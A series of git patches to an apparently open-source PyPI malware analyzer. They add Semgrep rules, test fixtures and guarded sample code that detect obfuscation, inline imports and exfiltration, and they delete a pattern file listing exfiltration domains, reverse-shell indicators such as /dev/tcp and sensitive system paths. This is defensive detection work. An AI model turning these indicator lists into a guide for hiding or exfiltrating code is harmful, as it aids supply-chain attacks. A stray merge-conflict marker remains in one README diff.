"file": "obfuscation/tools.py", + "start": 41, + "end": 41 + }, + { + "file": "obfuscation/tools.py", + "start": 42, + "end": 42 + }, + { + "file": "obfuscation/tools.py", + "start": 44, + "end": 45 + }, + { + "file": "obfuscation/tools.py", + "start": 47, + "end": 47 + }, + { + "file": "obfuscation/tools.py", + "start": 51, + "end": 51 + }, + { + "file": "obfuscation/tools.py", + "start": 53, + "end": 59 + }, + { + "file": "obfuscation/tools.py", + "start": 54, + "end": 54 + }, + { + "file": "obfuscation/tools.py", + "start": 55, + "end": 55 + }, + { + "file": "obfuscation/tools.py", + "start": 56, + "end": 56 + }, + { + "file": "obfuscation/tools.py", + "start": 58, + "end": 59 + }, + { + "file": "obfuscation/tools.py", + "start": 61, + "end": 61 + }, + { + "file": "obfuscation/tools.py", + "start": 65, + "end": 65 + }, + { + "file": "obfuscation/tools.py", + "start": 68, + "end": 68 + }, + { + "file": "obfuscation/tools.py", + "start": 68, + "end": 68 + } ] -} + } diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/obfuscation_tools.py similarity index 100% rename from tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py rename to tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/obfuscation_tools.py From 9c3efb042cb4ac7909d7ea511e918e68ea6d0850 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 27 Feb 2025 11:50:33 +1000 Subject: [PATCH 20/37] test: fixed broken tests for semgrep rules Signed-off-by: Carl Flottmann --- .../exfiltration/expected_results.json | 6 +- .../obfuscation/expected_results.json | 310 +++++++++--------- 2 files changed, 158 insertions(+), 158 deletions(-) diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json index 8890a70b6..83d6fa4e0 
100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json @@ -1,17 +1,17 @@ { "src.macaron.resources.pypi_malware_rules.exfiltration_remote-exfiltration": [ { - "file": "exfiltration/remote-exfiltration.py", + "file": "exfiltration/remote_exfiltration.py", "start": 31, "end": 31 }, { - "file": "exfiltration/remote-exfiltration.py", + "file": "exfiltration/remote_exfiltration.py", "start": 42, "end": 42 }, { - "file": "exfiltration/remote-exfiltration.py", + "file": "exfiltration/remote_exfiltration.py", "start": 50, "end": 50 } diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json index b4f1dce24..405e59905 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -1,156 +1,156 @@ { - "src.macaron.resources.pypi_malware_rules.obfuscation_decode-and-execute": [ - { - "file": "obfuscation/decode_and_execute.py", - "start": 30, - "end": 30 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 33, - "end": 33 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 38, - "end": 38 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 47, - "end": 47 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 55, - "end": 55 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 67, - "end": 67 - } - ], - "src.macaron.resources.pypi_malware_rules.obfuscation_obfuscation-tools": [ - { - "file": "obfuscation/tools.py", - "start": 23, - "end": 23 - }, - { - "file": "obfuscation/tools.py", - "start": 25, - "end": 31 - }, - { - "file": "obfuscation/tools.py", - "start": 26, - "end": 26 - }, - { 
- "file": "obfuscation/tools.py", - "start": 27, - "end": 27 - }, - { - "file": "obfuscation/tools.py", - "start": 28, - "end": 28 - }, - { - "file": "obfuscation/tools.py", - "start": 30, - "end": 31 - }, - { - "file": "obfuscation/tools.py", - "start": 33, - "end": 33 - }, - { - "file": "obfuscation/tools.py", - "start": 37, - "end": 37 - }, - { - "file": "obfuscation/tools.py", - "start": 39, - "end": 45 - }, - { - "file": "obfuscation/tools.py", - "start": 40, - "end": 40 - }, - { - "file": "obfuscation/tools.py", - "start": 41, - "end": 41 - }, - { - "file": "obfuscation/tools.py", - "start": 42, - "end": 42 - }, - { - "file": "obfuscation/tools.py", - "start": 44, - "end": 45 - }, - { - "file": "obfuscation/tools.py", - "start": 47, - "end": 47 - }, - { - "file": "obfuscation/tools.py", - "start": 51, - "end": 51 - }, - { - "file": "obfuscation/tools.py", - "start": 53, - "end": 59 - }, - { - "file": "obfuscation/tools.py", - "start": 54, - "end": 54 - }, - { - "file": "obfuscation/tools.py", - "start": 55, - "end": 55 - }, - { - "file": "obfuscation/tools.py", - "start": 56, - "end": 56 - }, - { - "file": "obfuscation/tools.py", - "start": 58, - "end": 59 - }, - { - "file": "obfuscation/tools.py", - "start": 61, - "end": 61 - }, - { - "file": "obfuscation/tools.py", - "start": 65, - "end": 65 - }, - { - "file": "obfuscation/tools.py", - "start": 68, - "end": 68 - }, - { - "file": "obfuscation/tools.py", - "start": 68, - "end": 68 - } - ] - } + "src.macaron.resources.pypi_malware_rules.obfuscation_decode-and-execute": [ + { + "file": "obfuscation/decode_and_execute.py", + "start": 30, + "end": 30 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 47, + "end": 47 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 55, + "end": 55 + }, + { + "file": 
"obfuscation/decode_and_execute.py", + "start": 67, + "end": 67 + } + ], + "src.macaron.resources.pypi_malware_rules.obfuscation_obfuscation-tools": [ + { + "file": "obfuscation/obfuscation_tools.py", + "start": 23, + "end": 23 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 25, + "end": 31 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 26, + "end": 26 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 27, + "end": 27 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 28, + "end": 28 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 30, + "end": 31 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 37, + "end": 37 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 39, + "end": 45 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 40, + "end": 40 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 41, + "end": 41 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 42, + "end": 42 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 44, + "end": 45 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 47, + "end": 47 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 51, + "end": 51 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 53, + "end": 59 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 54, + "end": 54 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 55, + "end": 55 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 56, + "end": 56 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 58, + "end": 59 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 61, + "end": 61 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 65, + "end": 65 + }, + { + "file": 
"obfuscation/obfuscation_tools.py", + "start": 68, + "end": 68 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 68, + "end": 68 + } + ] +} From 1e8f964b74ed24e6b5585fbd96f335cc692bce7a Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 27 Feb 2025 11:55:06 +1000 Subject: [PATCH 21/37] fix: obfuscation rules has updated socket patterns Signed-off-by: Carl Flottmann --- .../pypi_malware_rules/obfuscation.yaml | 16 +++++++++++++--- 1 file changed, 13 insertions(+), 3 deletions(-) diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml index ab956dfda..c81649715 100644 --- a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -89,9 +89,13 @@ rules: - patterns: - pattern-either: - patterns: - - pattern-inside: | - $SOC = socket.socket(...) - ... + - pattern-either: + - pattern-inside: | + $SOC = socket.socket(...) + ... + - pattern-inside: | + with socket.socket(...) as $SOC: + ... - pattern-either: - pattern-inside: | $SOC.connect(...) @@ -106,10 +110,16 @@ rules: - pattern-inside: | $SOC = socket.create_connection(...) ... + - pattern-inside: | + with socket.create_connection(...) as $SOC: + ... # socket.socket and socket.bind in one call - pattern-inside: | $SOC = socket.create_server(...) ... + - pattern-inside: | + with socket.create_server(...) as $SOC: + ... - pattern-either: # Assume that .accept, .listen was called somewhere if needed - pattern: $SOC.send(...) 
From 27cce81a509b75f7b0ba362799df64c2307f00c0 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 27 Feb 2025 15:43:02 +1000 Subject: [PATCH 22/37] feat: added new, refined inline imports rule back in Signed-off-by: Carl Flottmann --- .../pypi_malware_rules/obfuscation.yaml | 27 ++++++++ .../obfuscation/expected_results.json | 67 +++++++++++++++++++ .../obfuscation/inline_imports.py | 32 +++++++++ 3 files changed, 126 insertions(+) create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml index c81649715..78185ad75 100644 --- a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -2,6 +2,33 @@ # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. rules: +- id: obfuscation_inline-imports + metadata: + description: detect suspicious, hardcoded inline imports with immediate use. + message: Found an instance of an immediately used hardcoded inline import. 
+ languages: + - python + severity: ERROR + pattern-either: + - pattern: __import__('base64') + - pattern: __import__('builtins') + - pattern: __import__('subprocess') + - pattern: __import__('sys') + - pattern: __import__('os') + - pattern: __import__('zlib') + - pattern: __import__('marshal') + # python will evaluate a hex/oct string + - patterns: + - pattern: __import__('$HEX') + - metavariable-regex: + metavariable: $HEX + regex: (\\x\d{2})+ + - patterns: + - pattern: __import__('$OCT') + - metavariable-regex: + metavariable: $OCT + regex: (\\\d{3})+ + - id: obfuscation_obfuscation-tools metadata: description: detects the use of python obfuscation packages on the source code diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json index 405e59905..d3537611e 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -31,6 +31,73 @@ "end": 67 } ], + "src.macaron.resources.pypi_malware_rules.obfuscation_inline-imports": [ + { + "file": "obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 44, + "end": 44 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 23, + "end": 23 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 24, + "end": 24 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 25, + "end": 25 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 26, + "end": 26 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 27, + "end": 27 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 28, + "end": 28 + }, + { + "file": "obfuscation/inline_imports.py", + 
"start": 29, + "end": 29 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 31, + "end": 31 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 32, + "end": 32 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 69, + "end": 69 + } + ], "src.macaron.resources.pypi_malware_rules.obfuscation_obfuscation-tools": [ { "file": "obfuscation/obfuscation_tools.py", diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py new file mode 100644 index 000000000..80e006781 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py @@ -0,0 +1,32 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. 
+ """ + sys.exit() + + __import__('base64') + __import__('builtins') + __import__('subprocess') + __import__('sys') + __import__('os') + __import__('zlib') + __import__('marshal') + # these both just import builtins + __import__('\142\165\151\154\164\151\156\163') + __import__('\x62\x75\x69\x6c\x74\x69\x6e\x73') From adee95cc491f5de60d96031dade1e41a69040cbf Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 27 Feb 2025 16:12:27 +1000 Subject: [PATCH 23/37] docs: made API docs and updated malware analyzer README Signed-off-by: Carl Flottmann --- ...on.malware_analyzer.pypi_heuristics.sourcecode.rst | 8 ++++++++ src/macaron/malware_analyzer/README.md | 11 +++++++++++ 2 files changed, 19 insertions(+) diff --git a/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst b/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst index f53afc8d8..50b2b472d 100644 --- a/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst +++ b/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst @@ -9,6 +9,14 @@ macaron.malware\_analyzer.pypi\_heuristics.sourcecode package Submodules ---------- +macaron.malware\_analyzer.pypi\_heuristics.sourcecode.pypi\_sourcecode\_analyzer module +--------------------------------------------------------------------------------------- + +.. 
automodule:: macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer + :members: + :undoc-members: + :show-inheritance: + macaron.malware\_analyzer.pypi\_heuristics.sourcecode.suspicious\_setup module ------------------------------------------------------------------------------ diff --git a/src/macaron/malware_analyzer/README.md b/src/macaron/malware_analyzer/README.md index d5d30a670..11ec5db73 100644 --- a/src/macaron/malware_analyzer/README.md +++ b/src/macaron/malware_analyzer/README.md @@ -52,6 +52,17 @@ When a heuristic fails, with `HeuristicResult.FAIL`, then that is an indicator b - **Rule**: Return `HeuristicResult.FAIL` if the major or epoch is abnormally high; otherwise, return `HeuristicResult.PASS`. - **Dependency**: Will be run if the One Release heuristic fails. +### Experimental: Source Code Analysis with Semgrep + +The following analyzer has been added in as an experimental feature, available by supplying `--analyze-source` in the CLI to `macaron analyze`: + +**PyPI Source Code Analyzer** +- **Description**: Uses Semgrep, with default rules written in `src/macaron/resources/pypi_malware_rules` and custom rules available by supplying a path to `custom_semgrep_rules` in `defaults.ini`, to scan the package `.tar` source code. +- **Rule**: If any Semgrep rule is triggered, the heuristic fails with `HeuristicResult.FAIL` and subsequently fails the package with `CheckResultType.FAILED`. If no rule is triggered, the heuristic passes with `HeuristicResult.PASS` and the `CheckResultType` result from the combination of all other heuristics is maintained. +- **Dependency**: Will be run if the Source Code Repo fails. + +This feature is currently a work in progress, and supports detection of code obfuscation techniques and remote exfiltration behaviors. It uses Semgrep OSS for detection. 
+ ### Contributing When contributing an analyzer, it must meet the following requirements: From 01a47ecd582a8f5170f2af1bdd1f18181bdf5516 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 6 Mar 2025 14:47:17 +1000 Subject: [PATCH 24/37] docs: updated README and CONTRIBUTING for information on how to contribute to the malware analyzer Signed-off-by: Carl Flottmann --- CONTRIBUTING.md | 4 +++ src/macaron/malware_analyzer/README.md | 37 +++++++++++++++++++++++++- 2 files changed, 40 insertions(+), 1 deletion(-) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 6cc6516fb..3e21b8e57 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -72,6 +72,10 @@ See below for instructions to set up the development environment. - PRs should be merged using the `Squash and merge` strategy. In most cases a single commit with a detailed commit message body is preferred. Make sure to keep the `Signed-off-by` line in the body. +### PyPI Malware Detection Contribution + +Please see the [README for the malware analyzer](./src/macaron/malware_analyzer/README.md) for information on contributing Heuristics and code patterns. + ## Branching model * The `main` branch should be used as the base branch for pull requests. The `release` branch is designated for releases and should only be merged into when creating a new release for Macaron. diff --git a/src/macaron/malware_analyzer/README.md b/src/macaron/malware_analyzer/README.md index 11ec5db73..9c083e958 100644 --- a/src/macaron/malware_analyzer/README.md +++ b/src/macaron/malware_analyzer/README.md @@ -1,4 +1,4 @@ -# Implementation of Heuristic Malware Detector +# Implementation of Malware Detector ## PyPI Ecosystem @@ -70,6 +70,7 @@ When contributing an analyzer, it must meet the following requirements: - The analyzer must be implemented in a separate file, placed in the relevant folder based on what it analyzes ([metadata](./pypi_heuristics/metadata/) or [sourcecode](./pypi_heuristics/sourcecode/)). 
- The analyzer must inherit from the `BaseHeuristicAnalyzer` class and implement the `analyze` function, returning relevant information specific to the analysis. - The analyzer name must be added to [heuristics.py](./pypi_heuristics/heuristics.py) file so it can be used for rule combinations in [detect_malicious_metadata_check.py](../slsa_analyzer/checks/detect_malicious_metadata_check.py) +- The analyzer must be added to the list of analyzers in `detect_malicious_metadata_check.py` to be run. - Update the `malware_rules_problog_model` in [detect_malicious_metadata_check.py](../slsa_analyzer/checks/detect_malicious_metadata_check.py) with logical statements where the heuristic should be included. When adding new rules, please follow the following guidelines: - Provide a [confidence value](../slsa_analyzer/checks/check_result.py) using the `Confidence` enum. - Ensure it is assigned to the `problog_result_access` string variable, otherwise it will not be queried and evaluated. @@ -77,6 +78,40 @@ When contributing an analyzer, it must meet the following requirements: - Make sure to wrap pass/fail statements in `passed()` and `failed()`. Not doing so may result in undesirable behaviour, see the comments in the model for more details. - If there are commonly used combinations introduced by adding the heuristic, combine and justify them at the top of the static model (see `quickUndetailed` and `forceSetup` as current examples). +**Contributing Code Pattern Rules** + +When contributing more Semgrep rules for `pypi_sourcecode_analyzer.py` to use, the following requirements must be met: + +- Semgrep `.yaml` Rules are stored in `src/macaron/resources/pypi_malware_rules` and are named based on the category of code behaviors they detect. +- If the rule comes under one of the already defined categories, place it within that `.yaml` file, else create a new `.yaml` file using the category name. 
+- Each rule ID must be prefixed by the category followed by a single underscore ('_'), so for obfuscation rules in `obfuscation.yaml` each rule ID is prefixed with `obfuscation_`, followed by an ID which uses a hyphen ('-') as a separator. +- Tests must be written for each rule contributed. These are stored in `tests/malware_analyzer/pypi/test_pypi_sourcescode_analyzer.py`. +- These tests are written on a per-category basis, running each category individually. Each category must have a folder under `tests/malware_analyzer/pypi/resources/sourcecode_samples`. +- Within these folders, there must be sample code patterns for testing, and a file `expected_results.json` with the expected JSON output of the analyzer for that category. +- Each sample code pattern `.py` file must not have executable permissions and must include code that prevents it from being accidentally imported or run. The current files use this method: + +``` +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() +``` +>>>>>>> ae5a748 (docs: updated README and CONTRIBUTING for information on how to contribute to the malware analyzer) + ### Confidence Score Motivation The original seven heuristics which started this work were Empty Project Link, Unreachable Project Links, One Release, High Release Frequency, Unchange Release, Closer Release Join Date, and Suspicious Setup.
These heuristics (excluding those with a dependency) were run on 1167 packages from trusted organizations, with the following results: From 8bd4c0f2323d4d079ed6b147571e108256ddddba Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 6 Mar 2025 14:51:58 +1000 Subject: [PATCH 25/37] chore: removed old unused suspicious pattern yaml file. preserved in a branch off staging. Signed-off-by: Carl Flottmann --- .../sourcecode/suspicious_patterns.yaml | 101 ------------------ 1 file changed, 101 deletions(-) delete mode 100644 src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml deleted file mode 100644 index 3838e23a7..000000000 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml +++ /dev/null @@ -1,101 +0,0 @@ -# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. -# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. - - -#This file defines the malicious pattern. -#The pattern is collected from the malware repository of Pypi.org. 
-imports: -- requests -- base64 -- Fernet -- telebot -- platform -- ClientSession -- socket -- os -- getpass -- telegram -- __pyarmor__ -- urllib.request.urlopen -- subprocess -- Request - -calls: - os_detection: - - os.name - code_execution: - - exec - - subprocess.run - - subprocess.call - - subprocess.Popen - - subprocess.check_call - - os.system - info_collecting: - - os.getcwd - - os.getlogin - - os.getenv - - os.environ - - os.uname - - getpass.getuser - - socket.gethostname - - platform.node - - platform.system - - platform.version - - keyboard.on_release - obfuscation: - - base64.b64decode - - __pyarmor__ - # - Fernet.decrypt - remote_connection: - - requests.get - - requests.post - - telegram.send_document - - urllib.request.urlopen - - urllib.request.urlretrieve - - Request - - socket.socket - custom_setup: - - install - reverse_shell: - - os.dup2 - -constants: - domains: - - webhook.site - - discord - - cdn.discordapp.com - - oast.fun - - api.telegram.org - - diddlydingusdu.de # builderknower2 - - pipedream.net # business-kpi-manager - - 2.tcp.ngrok.io - - files.pypihosted.org - - filebin.net - - akinasouls.fr - - api.ipify.org # Get public IP of the victim - - httpbin.or - - ngrok.ap - - oastify.com - - pythonanywhere.com - - deliverycontent.online - local_path: - - /storage/emulated/0 # Android: primary user account on the device - - /etc/resolv.conf # DNS - - /etc/hosts # DNS - - /sys/class/net # Network related - - /run/systemd/resolve/stub-resolv.conf - - /sdcard/DCIM # Photo storage - executable: - - .exe - windows: - - APPDATA - - Start-Process # Execute command - - powershell - reverse_shell: - - /dev/tcp - os_detection: - - nt # Windows - - Windows - - Darwin # MacOS - - Linux - - posix # Linux From 79391f1b223fd9bc932dd9fb8244e6a404ccda10 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Tue, 11 Mar 2025 09:49:28 +1000 Subject: [PATCH 26/37] chore: updated sample permissions checker to have better error output Signed-off-by: Carl Flottmann 
--- .../dev_scripts/samples_permissions_checker.sh | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/scripts/dev_scripts/samples_permissions_checker.sh b/scripts/dev_scripts/samples_permissions_checker.sh index dc92366f0..fcbd3658b 100755 --- a/scripts/dev_scripts/samples_permissions_checker.sh +++ b/scripts/dev_scripts/samples_permissions_checker.sh @@ -8,6 +8,23 @@ # failing if any do. # +# Strict bash options. +# +# -e: exit immediately if a command fails (with non-zero return code), +# or if a function returns non-zero. +# +# -u: treat unset variables and parameters as error when performing +# parameter expansion. +# In case a variable ${VAR} is unset but we still need to expand, +# use the syntax ${VAR:-} to expand it to an empty string. +# +# -o pipefail: set the return value of a pipeline to the value of the last +# (rightmost) command to exit with a non-zero status, or zero +# if all commands in the pipeline exit successfully. +# +# Reference: https://www.gnu.org/software/bash/manual/html_node/The-Set-Builtin.html. +set -euo pipefail + MACARON_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && cd ../.. 
&& pwd)" SAMPLES_PATH="${MACARON_DIR}/tests/malware_analyzer/pypi/resources/sourcecode_samples" From 6b4cb7149a8ca6b352c25eeeaa53429afe311070 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Mon, 17 Mar 2025 16:59:38 +1000 Subject: [PATCH 27/37] chore: included semgrep message for each rule in JSON output for explanation Signed-off-by: Carl Flottmann --- .../sourcecode/pypi_sourcecode_analyzer.py | 15 +- .../pypi_malware_rules/exfiltration.yaml | 4 +- .../pypi_malware_rules/obfuscation.yaml | 12 +- .../exfiltration/expected_results.json | 37 +- .../obfuscation/expected_results.json | 451 +++++++++--------- 5 files changed, 267 insertions(+), 252 deletions(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index b6702b53a..82e2406af 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -12,7 +12,6 @@ import os import subprocess # nosec import tempfile -from collections import defaultdict from macaron.config.defaults import defaults from macaron.config.global_config import global_config @@ -146,7 +145,7 @@ def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicRes HeuristicAnalyzerValueError if there is no source code available. 
""" - analysis_result: defaultdict = defaultdict(list) + analysis_result: dict = {} # only run semgrep open-source features, and disable 'nosemgrep' ignoring so this does not bypass our scan semgrep_commands: list[str] = ["semgrep", "scan", "--oss-only", "--disable-nosem"] result: HeuristicResult = HeuristicResult.PASS @@ -189,15 +188,19 @@ def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicRes result = HeuristicResult.FAIL # some semgrep rules were triggered for finding in semgrep_findings: - category = json_extract(finding, ["check_id"], str) + rule_id = json_extract(finding, ["check_id"], str) file = json_extract(finding, ["path"], str) - if not category or not file: + if not rule_id or not file: continue file = os.path.relpath(file, os.path.dirname(source_code_path)) start = json_extract(finding, ["start", "line"], int) end = json_extract(finding, ["end", "line"], int) + message = json_extract(finding, ["extra", "message"], str) - analysis_result[category].append({"file": file, "start": start, "end": end}) + if rule_id not in analysis_result: + analysis_result[rule_id] = {"message": message, "detections": []} - return result, dict(analysis_result) + analysis_result[rule_id]["detections"].append({"file": file, "start": start, "end": end}) + + return result, analysis_result diff --git a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml index 4eee8d033..fd96eeef0 100644 --- a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml +++ b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml @@ -4,8 +4,8 @@ rules: - id: exfiltration_remote-exfiltration metadata: - description: Identifies the flow of sensitive information to a remote endpoint. - message: Detected exfiltration of sensitive data to a remote endpoint. + description: Detects the flow of sensitive information to a remote endpoint. 
+ message: Detected exfiltration of sensitive data to a remote endpoint languages: - python severity: ERROR diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml index 78185ad75..6d6ea066b 100644 --- a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -4,8 +4,8 @@ rules: - id: obfuscation_inline-imports metadata: - description: detect suspicious, hardcoded inline imports with immediate use. - message: Found an instance of an immediately used hardcoded inline import. + description: Detects use of inline imports with suspicious APIs, or obfuscated API imports. + message: Found an instance of a suspicious API in a hardcoded inline import languages: - python severity: ERROR @@ -31,8 +31,8 @@ rules: - id: obfuscation_obfuscation-tools metadata: - description: detects the use of python obfuscation packages on the source code - message: Found an instance of import and/or using python obfuscation tools + description: Detects the use of common python obfuscation packages. + message: Found an indicator of the use of a python code obfuscation tool languages: - python severity: ERROR @@ -67,8 +67,8 @@ rules: - id: obfuscation_decode-and-execute metadata: - description: detects the flow of a decoded or constructed string to process execution, code evaluation, network connections, or file writes - message: detected the flow of a decoded string value to a remote endpoint, process, code evaluation, or file write + description: Detects the flow of a decoded or constructed string to process execution, code evaluation, network connections, or file writes. 
+ message: Detected the flow of a decoded primitive value to a remote endpoint, process, code evaluation, or file write languages: - python severity: ERROR diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json index 83d6fa4e0..95ceffc0f 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json @@ -1,19 +1,22 @@ { - "src.macaron.resources.pypi_malware_rules.exfiltration_remote-exfiltration": [ - { - "file": "exfiltration/remote_exfiltration.py", - "start": 31, - "end": 31 - }, - { - "file": "exfiltration/remote_exfiltration.py", - "start": 42, - "end": 42 - }, - { - "file": "exfiltration/remote_exfiltration.py", - "start": 50, - "end": 50 - } - ] + "src.macaron.resources.pypi_malware_rules.exfiltration_remote-exfiltration": { + "message": "Detected exfiltration of sensitive data to a remote endpoint", + "detections": [ + { + "file": "exfiltration/remote_exfiltration.py", + "start": 31, + "end": 31 + }, + { + "file": "exfiltration/remote_exfiltration.py", + "start": 42, + "end": 42 + 